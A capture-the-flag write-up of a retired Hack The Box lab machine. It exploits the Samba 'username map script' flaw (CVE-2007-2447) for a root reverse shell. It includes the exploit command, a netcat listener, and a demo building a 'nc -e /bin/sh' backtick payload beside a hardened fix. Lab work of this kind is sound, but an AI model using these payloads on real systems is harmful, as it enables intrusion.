This machine is very easy and straightforward: a public exploit gives you root access directly. It is one of the retired machines on Hack The Box, so you need a VIP subscription to access it. Enjoy..
1. Enumeration:
- Nmap scan:
nmap -sC -sV 10.10.10.3 -Pn
or
sudo nmap -sV -O -F --version-light 10.10.10.3
Now we know the open ports and the services running on them:
- 21 » ftp
- 22 » ssh
- 139 » samba
- 445 » samba
FTP Enumeration:
- Let's try logging into FTP as anonymous with an empty password (just press Enter at the password prompt).
- The login is successful, but I found nothing in there.
Searching locally for exploits matching the Samba version nmap reported:
searchsploit samba 3.0.20
This finds an exploit for this version of Samba that leads to RCE.
Let's look at it and note its CVE number, so we can find a standalone version online instead of running it through Metasploit.
nano /usr/share/exploitdb/exploits/unix/remote/16320.rb
- CVE number » CVE-2007-2447
- Let's search for it on Google.
Found this GitHub Python exploit:
Let's install it and its dependencies, then check its usage. The script takes the target host and port followed by the attacker host and port for the reverse shell.
Exploitation:
First open a netcat listener on port 9001. Do this in a second terminal before launching the exploit, so the reverse shell has something to connect back to:
nc -lvnp 9001
Then run the exploit against the target:
python3 usermap_script.py 10.10.10.3 445 10.10.16.157 9001
//upgrading to an interactive (TTY) shell:
python -c 'import pty; pty.spawn("/bin/sh")'
id
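The exploit works because Samba 3.0.20 through 3.0.25rc3, when smb.conf sets "username map script", spliced the username from the SMB session setup into a shell command line and ran it through /bin/sh, so backticks in the username execute as the smbd user (root here). The following is an added example of my own, not code from this writeup or from the GitHub script used above. It builds a username in the shape the Metasploit module 16320.rb sends, then simulates the vulnerable and a hardened mapping path with a constructed `echo` standing in for the real mapping script; the regex allow-list is my own hardening, not Samba's actual patch.

```python
"""Mechanism behind CVE-2007-2447 (Samba 'username map script'), simulated.

Constructed demo: an `echo` command stands in for the mapping script that
smbd would run. Nothing here touches a real Samba server.
"""
import re
import subprocess


def build_payload(lhost: str, lport: int) -> str:
    """Username in the shape the public exploits send (same form as the
    Metasploit module 16320.rb): a nohup'd reverse shell inside backticks."""
    return f"/=`nohup nc -e /bin/sh {lhost} {lport}`"


def vulnerable_map(username: str) -> str:
    """Stand-in for the vulnerable code path: the raw username is placed inside
    a double-quoted shell command, so /bin/sh evaluates the backticks."""
    cmd = f'echo "{username}"'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_map(username: str) -> str:
    """Hardened form (my own, not Samba's real fix): no shell is involved, the
    username is a single argv element, so metacharacters stay literal."""
    return subprocess.run(["echo", username], capture_output=True, text=True).stdout


# Allow-list for usernames before any external mapping script is invoked
# (assumed policy for this example: alphanumerics, dot, underscore, dash).
_SAFE_USERNAME = re.compile(r"[A-Za-z0-9._-]{1,64}")


def is_safe_username(username: str) -> bool:
    """True only if the username contains no shell-significant characters."""
    return _SAFE_USERNAME.fullmatch(username) is not None


if __name__ == "__main__":
    # Constructed harmless probe with the same shape as the real payload.
    probe = "/=`echo INJECTED`"
    print("payload :", build_payload("10.10.16.157", 9001))
    print("vuln    :", vulnerable_map(probe).rstrip())   # backticks ran
    print("hardened:", hardened_map(probe).rstrip())     # printed literally
    print("allowed :", is_safe_username("makis"), is_safe_username(probe))
```

Run it and compare the two `echo` lines: the shell-spliced path prints `/=INJECTED` (the inner command ran), while the argv path prints the username untouched. That difference is the whole bug, and why the fix is to never hand attacker-controlled strings to a shell.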
//getting root flag:
cd /root
cat root.txt
//getting user flag:
find /home -name user.txt
cat /home/makis/user.txt
And that's it, I hope you enjoyed it..
If so, kindly give me respect on Hack The Box: Wh1rlw1nd-HTB.